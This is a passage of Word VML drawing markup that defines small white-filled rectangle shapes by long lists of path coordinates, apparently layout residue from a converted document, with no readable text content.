4977,3831,4977,3830,4977,3828,4977,3827,4977,3826,4977,3824,4977,3823,4977,3821,4977,3820,4977,3818,4977,3817,4977,3815,4977,3813,4977,3811,4977,3809,4977,3807,4977,3805,4977,3803,4977,3801,4977,3799,4977,3797,4977,3794,4977,3792,4977,3790,4977,3787,4977,3784,4977,3782,4977,3779,4977,3776,4977,3773,4977,3770,4977,3767,4977,3764,4977,3761,4977,3758,4977,3755,4977,3751,4977,3748,4977,3744,4977,3741,4977,3737,4977,3733,4977,3729,4977,3725,4977,3721,4977,3717,4977,3713,4977,3708,4977,3704,4977,3700,4977,3695,4977,3690,4977,3686,4977,3681,4977,3676,4977,3671,4977,3665,4977,3660,4977,3655,4977,3649,4977,3644,4977,3638,4977,3632,4977,3627,4977,3621,4977,3615,4977,3608,4977,3602,4977,3596e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:178.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,3570" coordsize="130,270">
        <v:shape style="position:absolute;left:6390;top:3570;width:130;height:270" coordorigin="6390,3570" coordsize="130,270" path="m6417,3596l6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6417,3596,6418,3596,6418,3596,6418,3596,6418,3596,6418,3596,6418,3596,6418,3596,6418,3596,6418,3596,6418,3596,6418,3596,6419,3596,6419,3596,6419,3596,6419,3596,6419,3596,6420,3596,6420,3596,6420,3596,6420,3596,6421,3596,6421,3596,6421,3596,6421,3596,6422,3596,6422,3596,6423,3596,6423,3596,6423,3596,6424,3596,6424,3596,6425,3596,6425,3596,6426,3596,6426,3596,6427,3596,6427,3596,6428,3596,6428,3596,6429,3596,6430,3596,6430,3596,6431,3596,6432,3596,6433,3596,6433,3596,6434,3596,6435,3596,6436,3596,6437,3596,6438,3596,6439,3596,6440,3596,6441,3596,6442,3596,6443,3596,6444,3596,6445,3596,6446,3596,6447,3596,6449,3596,6450,3596,6451,3596,6452,3596,6454,3596,6455,3596,6457,3596,6458,3596,6459,3596,6461,3596,6463,3596,6464,3596,6466,3596,6467,3596,6469,3596,6471,3596,6473,3596,6475,3596,6476,3596,6478,3596,6480,3596,6482,3596,6484,3596,6486,3596,6488,3596,6491,3596,6493,3596,6495,3596,6497,3596,6500,3596,6502,3596,6505,3596,6507,3596,6509,3596,6512,3596,6515,3596,6517,3596,6520,3596,6523,3596,6526,3596,6528,3596,6531,3596,6534,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3596,6537,3597,6537,3597,6537,3597,6537,3597,6537,3597,6537,3597,6537,3598,6537,3598,6537,3598,6537,3598,6537,3599,6537,3599,6537,3600,6537,3600,6537,3600,6537,3601,6537,3601,6537,3602,6537,3602,6537,3603,6537,3603,6537,3604,6537,3605,6537,3606,6537,3606,6537,3607,6537,3608,6537,3609,6537,3610,6537,3611,6537,3612,6537,3613,6537,3614,6537,3615,6537,3616,6537,3617,6537,3618,6537,3620,6537,3621,6537,3622,6537,3624,6537,3625,6537,3627,6537,3629,6537,3630,6537,3632,6537,3634,6537,3635,6537,3637,6537,3639,6537,3641,6537,3643,6537,3646,6537,3648,6537,3650,6537,3652,6537,3655,6537,3657,6537,3660,6537,3662,6537,3665,6537,3668,6537,3670,6537,3673,6537,3676,6537,3679,6537,3682,6537,3686,6537,3689,6537,3692,6537,3696,6537,3699,6537,3703,6537,3706,6537,3710,6537,3714,6537,3718,6537,3722,6537,3726,6537,3730,6537,3734,6537,3738,6537,3743,6537,3747,6537,3752,6537,3756,6537,3761,6537,3766,6537,3771,6537,3776,6537,3781,6537,3787,6537,3792,6537,3797,6537,3803,6537,3809,6537,3814,6537,3820,6537,3826,6537,3832,6537,3838,6537,3845,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6537,3851,6536,3851,6536,3851,6536,3851,6536,3851,6536,3851,6536,3851,6536,3851,6535,3851,6535,3851,6535,3851,6535,3851,6534,3851,6534,3851,6534,3851,6534,3851,6533,3851,6533,3851,6533,3851,6532,3851,6532,3851,6532,3851,6531,3851,6531,3851,6530,3851,6530,3851,6529,3851,6529,3851,6528,3851,6528,3851,6527,3851,6527,3851,6526,3851,6525,3851,6525,3851,6524,3851,6523,3851,6523,3851,6522,3851,6521,3851,6520,3851,6519,3851,6519,3851,6518,3851,6517,3851,6516,3851,6515,3851,6514,3851,6513,3851,6512,3851,6511,3851,6510,3851,6508,3851,6507,3851,6506,3851,6505,3851,6503,3851,6502,3851,6501,3851,6499,3851,6498,3851,6497,3851,6495,3851,6494,3851,6492,3851,6490,3851,6489,3851,6487,3851,6485,3851,6484,3851,6482,3851,6480,3851,6478,3851,6476,3851,6474,3851,6472,3851,6470,3851,6468,3851,6466,3851,6464,3851,6462,3851,6459,3851,6457,3851,6455,3851,6452,3851,6450,3851,6448,3851,6445,3851,6442,3851,6440,3851,6437,3851,6434,3851,6432,3851,6429,3851,6426,3851,6423,3851,6420,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3851,6417,3850,6417,3850,6417,3850,6417,3850,6417,3850,6417,3850,6417,3850,6417,3849,6417,3849,6417,3849,6417,3849,6417,3848,6417,3848,6417,3848,6417,3847,6417,3847,6417,3846,6417,3846,6417,3845,6417,3845,6417,3844,6417,3844,6417,3843,6417,3843,6417,3842,6417,3841,6417,3841,6417,3840,6417,3839,6417,3838,6417,3837,6417,3836,6417,3835,6417,3834,6417,3833,6417,3832,6417,3831,6417,3830,6417,3828,6417,3827,6417,3826,6417,3824,6417,3823,6417,3821,6417,3820,6417,3818,6417,3817,6417,3815,6417,3813,6417,3811,6417,3809,6417,3807,6417,3805,6417,3803,6417,3801,6417,3799,6417,3797,6417,3794,6417,3792,6417,3790,6417,3787,6417,3784,6417,3782,6417,3779,6417,3776,6417,3773,6417,3770,6417,3767,6417,3764,6417,3761,6417,3758,6417,3755,6417,3751,6417,3748,6417,3744,6417,3741,6417,3737,6417,3733,6417,3729,6417,3725,6417,3721,6417,3717,6417,3713,6417,3708,6417,3704,6417,3700,6417,3695,6417,3690,6417,3686,6417,3681,6417,3676,6417,3671,6417,3665,6417,3660,6417,3655,6417,3649,6417,3644,6417,3638,6417,3632,6417,3627,6417,3621,6417,3615,6417,3608,6417,3602,6417,3596e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:144.500pt;margin-top:232.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2890,4650" coordsize="130,250">
        <v:shape style="position:absolute;left:2890;top:4650;width:130;height:250" coordorigin="2890,4650" coordsize="130,250" path="m2905,4661l2905,4661,2905,4661,2905,4661,2905,4661,2905,4661,2905,4661,2905,4661,2905,4661,2905,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2906,4661,2907,4661,2907,4661,2907,4661,2907,4661,2907,4661,2907,4661,2908,4661,2908,4661,2908,4661,2908,4661,2909,4661,2909,4661,2909,4661,2909,4661,2910,4661,2910,4661,2910,4661,2911,4661,2911,4661,2912,4661,2912,4661,2912,4661,2913,4661,2913,4661,2914,4661,2914,4661,2915,4661,2915,4661,2916,4661,2917,4661,2917,4661,2918,4661,2919,4661,2919,4661,2920,4661,2921,4661,2922,4661,2922,4661,2923,4661,2924,4661,2925,4661,2926,4661,2927,4661,2928,4661,2929,4661,2930,4661,2931,4661,2932,4661,2933,4661,2934,4661,2936,4661,2937,4661,2938,4661,2939,4661,2941,4661,2942,4661,2943,4661,2945,4661,2946,4661,2948,4661,2949,4661,2951,4661,2952,4661,2954,4661,2956,4661,2957,4661,2959,4661,2961,4661,2963,4661,2965,4661,2967,4661,2968,4661,2970,4661,2973,4661,2975,4661,2977,4661,2979,4661,2981,4661,2983,4661,2986,4661,2988,4661,2990,4661,2993,4661,2995,4661,2998,4661,3000,4661,3003,4661,3006,4661,3008,4661,3011,4661,3014,4661,3017,4661,3020,4661,3023,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4661,3026,4662,3026,4662,3026,4662,3026,4662,3026,4662,3026,4662,3026,4662,3026,4662,3026,4662,3026,4662,3026,4663,3026,4663,3026,4663,3026,4663,3026,4663,3026,4664,3026,4664,3026,4664,3026,4665,3026,4665,3026,4665,3026,4666,3026,4666,3026,4667,3026,4667,3026,4668,3026,4668,3026,4669,3026,4670,3026,4670,3026,4671,3026,4672,3026,4673,3026,4673,3026,4674,3026,4675,3026,4676,3026,4677,3026,4678,3026,4679,3026,4680,3026,4681,3026,4683,3026,4684,3026,4685,3026,4687,3026,4688,3026,4689,3026,4691,3026,4692,3026,4694,3026,4696,3026,4697,3026,4699,3026,4701,3026,4703,3026,4705,3026,4707,3026,4709,3026,4711,3026,4713,3026,4716,3026,4718,3026,4720,3026,4723,3026,4725,3026,4728,3026,4730,3026,4733,3026,4736,3026,4739,3026,4742,3026,4745,3026,4748,3026,4751,3026,4754,3026,4758,3026,4761,3026,4765,3026,4768,3026,4772,3026,4775,3026,4779,3026,4783,3026,4787,3026,4791,3026,4795,3026,4800,3026,4804,3026,4808,3026,4813,3026,4817,3026,4822,3026,4827,3026,4832,3026,4837,3026,4842,3026,4847,3026,4852,3026,4857,3026,4863,3026,4868,3026,4874,3026,4880,3026,4886,3026,4892,3026,4898,3026,4904,3026,4910,3026,4916,3026,4916,3026,4916,3026,4916,3026,4916,3026,4916,3026,4916,3026,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3025,4916,3024,4916,3024,4916,3024,4916,3024,4916,3024,4916,3024,4916,3023,4916,3023,4916,3023,4916,3023,4916,3022,4916,3022,4916,3022,4916,3022,4916,3021,4916,3021,4916,3021,4916,3020,4916,3020,4916,3019,4916,3019,4916,3019,4916,3018,4916,3018,4916,3017,4916,3017,4916,3016,4916,3016,4916,3015,4916,3014,4916,3014,4916,3013,4916,3012,4916,3012,4916,3011,4916,3010,4916,3009,4916,3009,4916,3008,4916,3007,4916,3006,4916,3005,4916,3004,4916,3003,4916,3002,4916,3001,4916,3000,4916,2999,4916,2998,4916,2997,4916,2995,4916,2994,4916,2993,4916,2992,4916,2990,4916,2989,4916,2988,4916,2986,4916,2985,4916,2983,4916,2982,4916,2980,4916,2979,4916,2977,4916,2975,4916,2974,4916,2972,4916,2970,4916,2968,4916,2966,4916,2964,4916,2962,4916,2960,4916,2958,4916,2956,4916,2954,4916,2952,4916,2950,4916,2948,4916,2945,4916,2943,4916,2941,4916,2938,4916,2936,4916,2933,4916,2931,4916,2928,4916,2925,4916,2923,4916,2920,4916,2917,4916,2914,4916,2911,4916,2908,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4916,2905,4915,2905,4915,2905,4915,2905,4915,2905,4915,2905,4914,2905,4914,2905,4914,2905,4913,2905,4913,2905,4913,2905,4912,2905,4912,2905,4912,2905,4911,2905,4911,2905,4910,2905,4909,2905,4909,2905,4908,2905,4907,2905,4907,2905,4906,2905,4905,2905,4904,2905,4904,2905,4903,2905,4902,2905,4901,2905,4900,2905,4899,2905,4898,2905,4896,2905,4895,2905,4894,2905,4893,2905,4891,2905,4890,2905,4888,2905,4887,2905,4885,2905,4884,2905,4882,2905,4880,2905,4879,2905,4877,2905,4875,2905,4873,2905,4871,2905,4869,2905,4867,2905,4865,2905,4862,2905,4860,2905,4858,2905,4855,2905,4853,2905,4850,2905,4847,2905,4845,2905,4842,2905,4839,2905,4836,2905,4833,2905,4830,2905,4827,2905,4824,2905,4820,2905,4817,2905,4813,2905,4810,2905,4806,2905,4802,2905,4799,2905,4795,2905,4791,2905,4787,2905,4783,2905,4778,2905,4774,2905,4770,2905,4765,2905,4760,2905,4756,2905,4751,2905,4746,2905,4741,2905,4736,2905,4731,2905,4726,2905,4720,2905,4715,2905,4709,2905,4704,2905,4698,2905,4692,2905,4686,2905,4680,2905,4674,2905,4668,2905,4661e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.500pt;margin-top:250.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3370,5010" coordsize="130,270">
        <v:shape style="position:absolute;left:3370;top:5010;width:130;height:270" coordorigin="3370,5010" coordsize="130,270" path="m3386,5037l3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3386,5037,3387,5037,3387,5037,3387,5037,3387,5037,3387,5037,3387,5037,3387,5037,3388,5037,3388,5037,3388,5037,3388,5037,3389,5037,3389,5037,3389,5037,3389,5037,3390,5037,3390,5037,3390,5037,3391,5037,3391,5037,3391,5037,3392,5037,3392,5037,3393,5037,3393,5037,3394,5037,3394,5037,3395,5037,3395,5037,3396,5037,3396,5037,3397,5037,3398,5037,3398,5037,3399,5037,3400,5037,3400,5037,3401,5037,3402,5037,3403,5037,3404,5037,3404,5037,3405,5037,3406,5037,3407,5037,3408,5037,3409,5037,3410,5037,3411,5037,3412,5037,3413,5037,3415,5037,3416,5037,3417,5037,3418,5037,3420,5037,3421,5037,3422,5037,3424,5037,3425,5037,3426,5037,3428,5037,3429,5037,3431,5037,3433,5037,3434,5037,3436,5037,3438,5037,3439,5037,3441,5037,3443,5037,3445,5037,3447,5037,3449,5037,3451,5037,3453,5037,3455,5037,3457,5037,3459,5037,3461,5037,3464,5037,3466,5037,3468,5037,3471,5037,3473,5037,3475,5037,3478,5037,3481,5037,3483,5037,3486,5037,3489,5037,3491,5037,3494,5037,3497,5037,3500,5037,3503,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5037,3506,5038,3506,5038,3506,5038,3506,5038,3506,5038,3506,5039,3506,5039,3506,5039,3506,5040,3506,5040,3506,5040,3506,5041,3506,5041,3506,5041,3506,5042,3506,5042,3506,5043,3506,5044,3506,5044,3506,5045,3506,5046,3506,5046,3506,5047,3506,5048,3506,5049,3506,5049,3506,5050,3506,5051,3506,5052,3506,5053,3506,5054,3506,5055,3506,5057,3506,5058,3506,5059,3506,5060,3506,5062,3506,5063,3506,5065,3506,5066,3506,5068,3506,5069,3506,5071,3506,5073,3506,5074,3506,5076,3506,5078,3506,5080,3506,5082,3506,5084,3506,5086,3506,5088,3506,5091,3506,5093,3506,5095,3506,5098,3506,5100,3506,5103,3506,5106,3506,5108,3506,5111,3506,5114,3506,5117,3506,5120,3506,5123,3506,5126,3506,5130,3506,5133,3506,5136,3506,5140,3506,5143,3506,5147,3506,5151,3506,5154,3506,5158,3506,5162,3506,5166,3506,5170,3506,5175,3506,5179,3506,5183,3506,5188,3506,5193,3506,5197,3506,5202,3506,5207,3506,5212,3506,5217,3506,5222,3506,5227,3506,5233,3506,5238,3506,5244,3506,5249,3506,5255,3506,5261,3506,5267,3506,5273,3506,5279,3506,5285,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3506,5292,3505,5292,3505,5292,3505,5292,3505,5292,3505,5292,3505,5292,3505,5292,3505,5292,3505,5292,3505,5292,3505,5292,3504,5292,3504,5292,3504,5292,3504,5292,3504,5292,3503,5292,3503,5292,3503,5292,3503,5292,3502,5292,3502,5292,3502,5292,3502,5292,3501,5292,3501,5292,3500,5292,3500,5292,3500,5292,3499,5292,3499,5292,3498,5292,3498,5292,3497,5292,3497,5292,3496,5292,3496,5292,3495,5292,3495,5292,3494,5292,3493,5292,3493,5292,3492,5292,3491,5292,3490,5292,3490,5292,3489,5292,3488,5292,3487,5292,3486,5292,3485,5292,3484,5292,3483,5292,3482,5292,3481,5292,3480,5292,3479,5292,3478,5292,3477,5292,3476,5292,3474,5292,3473,5292,3472,5292,3471,5292,3469,5292,3468,5292,3466,5292,3465,5292,3464,5292,3462,5292,3460,5292,3459,5292,3457,5292,3456,5292,3454,5292,3452,5292,3450,5292,3448,5292,3447,5292,3445,5292,3443,5292,3441,5292,3439,5292,3437,5292,3435,5292,3432,5292,3430,5292,3428,5292,3426,5292,3423,5292,3421,5292,3418,5292,3416,5292,3413,5292,3411,5292,3408,5292,3406,5292,3403,5292,3400,5292,3397,5292,3395,5292,3392,5292,3389,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5292,3386,5291,3386,5291,3386,5291,3386,5291,3386,5291,3386,5291,3386,5291,3386,5291,3386,5291,3386,5290,3386,5290,3386,5290,3386,5290,3386,5290,3386,5289,3386,5289,3386,5289,3386,5288,3386,5288,3386,5288,3386,5287,3386,5287,3386,5286,3386,5286,3386,5285,3386,5285,3386,5284,3386,5283,3386,5283,3386,5282,3386,5281,3386,5280,3386,5280,3386,5279,3386,5278,3386,5277,3386,5276,3386,5275,3386,5274,3386,5273,3386,5272,3386,5270,3386,5269,3386,5268,3386,5266,3386,5265,3386,5264,3386,5262,3386,5261,3386,5259,3386,5257,3386,5256,3386,5254,3386,5252,3386,5250,3386,5248,3386,5246,3386,5244,3386,5242,3386,5240,3386,5237,3386,5235,3386,5233,3386,5230,3386,5228,3386,5225,3386,5223,3386,5220,3386,5217,3386,5214,3386,5211,3386,5208,3386,5205,3386,5202,3386,5199,3386,5195,3386,5192,3386,5188,3386,5185,3386,5181,3386,5178,3386,5174,3386,5170,3386,5166,3386,5162,3386,5158,3386,5153,3386,5149,3386,5145,3386,5140,3386,5136,3386,5131,3386,5126,3386,5121,3386,5116,3386,5111,3386,5106,3386,5101,3386,5096,3386,5090,3386,5085,3386,5079,3386,5073,3386,5067,3386,5061,3386,5055,3386,5049,3386,5043,3386,5037e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:370.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,7410" coordsize="130,250">
        <v:shape style="position:absolute;left:1950;top:7410;width:130;height:250" coordorigin="1950,7410" coordsize="130,250" path="m1975,7423l1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1975,7423,1976,7423,1976,7423,1976,7423,1976,7423,1976,7423,1976,7423,1976,7423,1976,7423,1977,7423,1977,7423,1977,7423,1977,7423,1977,7423,1978,7423,1978,7423,1978,7423,1978,7423,1979,7423,1979,7423,1979,7423,1980,7423,1980,7423,1980,7423,1981,7423,1981,7423,1981,7423,1982,7423,1982,7423,1983,7423,1983,7423,1984,7423,1984,7423,1985,7423,1986,7423,1986,7423,1987,7423,1988,7423,1988,7423,1989,7423,1990,7423,1990,7423,1991,7423,1992,7423,1993,7423,1994,7423,1995,7423,1995,7423,1996,7423,1997,7423,1998,7423,1999,7423,2000,7423,2002,7423,2003,7423,2004,7423,2005,7423,2006,7423,2008,7423,2009,7423,2010,7423,2011,7423,2013,7423,2014,7423,2016,7423,2017,7423,2019,7423,2020,7423,2022,7423,2024,7423,2025,7423,2027,7423,2029,7423,2030,7423,2032,7423,2034,7423,2036,7423,2038,7423,2040,7423,2042,7423,2044,7423,2046,7423,2048,7423,2051,7423,2053,7423,2055,7423,2057,7423,2060,7423,2062,7423,2065,7423,2067,7423,2070,7423,2072,7423,2075,7423,2078,7423,2081,7423,2083,7423,2086,7423,2089,7423,2092,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7423,2095,7424,2095,7424,2095,7424,2095,7424,2095,7424,2095,7425,2095,7425,2095,7425,2095,7425,2095,7426,2095,7426,2095,7426,2095,7427,2095,7427,2095,7428,2095,7428,2095,7429,2095,7429,2095,7430,2095,7430,2095,7431,2095,7432,2095,7432,2095,7433,2095,7434,2095,7435,2095,7436,2095,7437,2095,7437,2095,7438,2095,7439,2095,7441,2095,7442,2095,7443,2095,7444,2095,7445,2095,7447,2095,7448,2095,7449,2095,7451,2095,7452,2095,7454,2095,7455,2095,7457,2095,7459,2095,7461,2095,7462,2095,7464,2095,7466,2095,7468,2095,7470,2095,7472,2095,7475,2095,7477,2095,7479,2095,7482,2095,7484,2095,7487,2095,7489,2095,7492,2095,7495,2095,7497,2095,7500,2095,7503,2095,7506,2095,7509,2095,7512,2095,7516,2095,7519,2095,7522,2095,7526,2095,7529,2095,7533,2095,7537,2095,7541,2095,7545,2095,7548,2095,7553,2095,7557,2095,7561,2095,7565,2095,7570,2095,7574,2095,7579,2095,7583,2095,7588,2095,7593,2095,7598,2095,7603,2095,7608,2095,7613,2095,7619,2095,7624,2095,7630,2095,7635,2095,7641,2095,7647,2095,7653,2095,7659,2095,7665,2095,7671,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2095,7678,2094,7678,2094,7678,2094,7678,2094,7678,2094,7678,2094,7678,2094,7678,2094,7678,2093,7678,2093,7678,2093,7678,2093,7678,2093,7678,2092,7678,2092,7678,2092,7678,2092,7678,2091,7678,2091,7678,2091,7678,2090,7678,2090,7678,2090,7678,2089,7678,2089,7678,2089,7678,2088,7678,2088,7678,2087,7678,2087,7678,2086,7678,2086,7678,2085,7678,2084,7678,2084,7678,2083,7678,2083,7678,2082,7678,2081,7678,2080,7678,2080,7678,2079,7678,2078,7678,2077,7678,2076,7678,2075,7678,2075,7678,2074,7678,2073,7678,2072,7678,2071,7678,2070,7678,2068,7678,2067,7678,2066,7678,2065,7678,2064,7678,2063,7678,2061,7678,2060,7678,2059,7678,2057,7678,2056,7678,2054,7678,2053,7678,2051,7678,2050,7678,2048,7678,2047,7678,2045,7678,2043,7678,2041,7678,2040,7678,2038,7678,2036,7678,2034,7678,2032,7678,2030,7678,2028,7678,2026,7678,2024,7678,2022,7678,2019,7678,2017,7678,2015,7678,2013,7678,2010,7678,2008,7678,2005,7678,2003,7678,2000,7678,1998,7678,1995,7678,1992,7678,1990,7678,1987,7678,1984,7678,1981,7678,1978,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7678,1975,7677,1975,7677,1975,7677,1975,7677,1975,7677,1975,7677,1975,7677,1975,7676,1975,7676,1975,7676,1975,7676,1975,7676,1975,7675,1975,7675,1975,7675,1975,7674,1975,7674,1975,7673,1975,7673,1975,7672,1975,7672,1975,7671,1975,7671,1975,7670,1975,7670,1975,7669,1975,7668,1975,7667,1975,7667,1975,7666,1975,7665,1975,7664,1975,7663,1975,7662,1975,7661,1975,7660,1975,7659,1975,7658,1975,7657,1975,7655,1975,7654,1975,7653,1975,7651,1975,7650,1975,7648,1975,7647,1975,7645,1975,7644,1975,7642,1975,7640,1975,7638,1975,7636,1975,7634,1975,7632,1975,7630,1975,7628,1975,7626,1975,7624,1975,7621,1975,7619,1975,7617,1975,7614,1975,7611,1975,7609,1975,7606,1975,7603,1975,7600,1975,7597,1975,7594,1975,7591,1975,7588,1975,7585,1975,7582,1975,7578,1975,7575,1975,7571,1975,7568,1975,7564,1975,7560,1975,7556,1975,7552,1975,7548,1975,7544,1975,7540,1975,7535,1975,7531,1975,7526,1975,7522,1975,7517,1975,7512,1975,7508,1975,7503,1975,7498,1975,7492,1975,7487,1975,7482,1975,7476,1975,7471,1975,7465,1975,7459,1975,7454,1975,7448,1975,7442,1975,7435,1975,7429,1975,7423e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:157.500pt;margin-top:370.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3150,7410" coordsize="130,250">
        <v:shape style="position:absolute;left:3150;top:7410;width:130;height:250" coordorigin="3150,7410" coordsize="130,250" path="m3176,7423l3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3176,7423,3177,7423,3177,7423,3177,7423,3177,7423,3177,7423,3177,7423,3178,7423,3178,7423,3178,7423,3178,7423,3178,7423,3179,7423,3179,7423,3179,7423,3180,7423,3180,7423,3180,7423,3181,7423,3181,7423,3181,7423,3182,7423,3182,7423,3183,7423,3183,7423,3183,7423,3184,7423,3185,7423,3185,7423,3186,7423,3186,7423,3187,7423,3187,7423,3188,7423,3189,7423,3190,7423,3190,7423,3191,7423,3192,7423,3193,7423,3193,7423,3194,7423,3195,7423,3196,7423,3197,7423,3198,7423,3199,7423,3200,7423,3201,7423,3202,7423,3203,7423,3204,7423,3206,7423,3207,7423,3208,7423,3209,7423,3211,7423,3212,7423,3213,7423,3215,7423,3216,7423,3218,7423,3219,7423,3221,7423,3223,7423,3224,7423,3226,7423,3228,7423,3229,7423,3231,7423,3233,7423,3235,7423,3237,7423,3239,7423,3241,7423,3243,7423,3245,7423,3247,7423,3249,7423,3251,7423,3253,7423,3256,7423,3258,7423,3260,7423,3263,7423,3265,7423,3268,7423,3270,7423,3273,7423,3276,7423,3278,7423,3281,7423,3284,7423,3287,7423,3290,7423,3293,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7423,3296,7424,3296,7424,3296,7424,3296,7424,3296,7424,3296,7425,3296,7425,3296,7425,3296,7425,3296,7426,3296,7426,3296,7426,3296,7427,3296,7427,3296,7428,3296,7428,3296,7429,3296,7429,3296,7430,3296,7430,3296,7431,3296,7432,3296,7432,3296,7433,3296,7434,3296,7435,3296,7436,3296,7437,3296,7437,3296,7438,3296,7439,3296,7441,3296,7442,3296,7443,3296,7444,3296,7445,3296,7447,3296,7448,3296,7449,3296,7451,3296,7452,3296,7454,3296,7455,3296,7457,3296,7459,3296,7461,3296,7462,3296,7464,3296,7466,3296,7468,3296,7470,3296,7472,3296,7475,3296,7477,3296,7479,3296,7482,3296,7484,3296,7487,3296,7489,3296,7492,3296,7495,3296,7497,3296,7500,3296,7503,3296,7506,3296,7509,3296,7512,3296,7516,3296,7519,3296,7522,3296,7526,3296,7529,3296,7533,3296,7537,3296,7541,3296,7545,3296,7548,3296,7553,3296,7557,3296,7561,3296,7565,3296,7570,3296,7574,3296,7579,3296,7583,3296,7588,3296,7593,3296,7598,3296,7603,3296,7608,3296,7613,3296,7619,3296,7624,3296,7630,3296,7635,3296,7641,3296,7647,3296,7653,3296,7659,3296,7665,3296,7671,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3296,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3295,7678,3294,7678,3294,7678,3294,7678,3294,7678,3294,7678,3294,7678,3293,7678,3293,7678,3293,7678,3293,7678,3292,7678,3292,7678,3292,7678,3291,7678,3291,7678,3291,7678,3290,7678,3290,7678,3290,7678,3289,7678,3289,7678,3288,7678,3288,7678,3287,7678,3287,7678,3286,7678,3286,7678,3285,7678,3284,7678,3284,7678,3283,7678,3282,7678,3282,7678,3281,7678,3280,7678,3279,7678,3279,7678,3278,7678,3277,7678,3276,7678,3275,7678,3274,7678,3273,7678,3272,7678,3271,7678,3270,7678,3269,76